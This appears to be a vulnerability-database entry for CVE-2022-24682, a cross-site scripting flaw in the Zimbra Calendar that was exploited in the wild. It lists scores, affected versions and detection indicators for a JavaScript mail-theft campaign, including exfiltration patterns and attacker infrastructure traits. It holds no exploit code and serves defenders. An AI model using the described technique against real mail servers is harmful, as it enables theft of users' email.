cbcvebase.
CVE-2022-24682
published 2022-02-09

CVE-2022-24682: An issue was discovered in the Calendar feature in Zimbra Collaboration Suite 8.8.x before 8.8.15 patch 30 (update 1), as exploited in the wild starting in…

PriorityP184medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
KEVITWEXPLOITRansomware
CISA Known Exploited Vulnerabilitydue 2022-03-11
Exploited in the wild
EPSS
31.06%
98.0th percentile
An issue was discovered in the Calendar feature in Zimbra Collaboration Suite 8.8.x before 8.8.15 patch 30 (update 1), as exploited in the wild starting in December 2021. An attacker could place HTML containing executable JavaScript inside element attributes. This markup becomes unescaped, causing arbitrary markup to be injected into the document.

Affected

2 ranges
VendorProductVersion rangeFixed in
synacorzimbra_collaboration_suite
synacorzimbra_collaboration_suite>= 8.8.0 < 8.8.158.8.15

Detection & IOCsextracted from sources · hover to see the quote

  • Monitor for outbound HTTP POST requests from Zimbra webmail sessions to external domains, which may indicate the JavaScript mail-theft payload exfiltrating email body and attachment data.
  • The attacker's JavaScript payload must first request a page containing a CSRF-Token before making subsequent mail-theft requests; monitor for anomalous CSRF-token fetches followed by bulk mail retrieval in Zimbra logs.
  • Reconnaissance phase used unique per-target image-beacon URLs (Freenom .ga domains on AS399269/BitLaunch) embedded in spear-phishing emails; monitor for outbound GET requests to .ga/.tk/.ml Freenom domains from mail clients.
  • All attacker-controlled servers were observed running Apache 2.4.6 on CentOS with PHP 5.4.16 with ZeroSSL certificates; this server fingerprint can be used to pivot on related infrastructure.
  • Attacker used 74 unique outlook.com sender addresses formatted as <name>_<name>@outlook.com or <name>.<name>@outlook.com with feminine first names; flag bulk outlook.com senders with this naming pattern targeting Zimbra users.
  • ·CVE-2022-24682 affects only Zimbra Collaboration Suite 8.8.x before 8.8.15 patch 30 update 2; version 9.0.0 was tested and found likely unaffected.
  • ·The specific vulnerable URI pattern required for exploitation was intentionally withheld by Volexity at time of initial disclosure due to the absence of a patch.

CVSS provenance

nvdv3.16.1MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
vulncheck6.1MEDIUM
cisa6.1MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.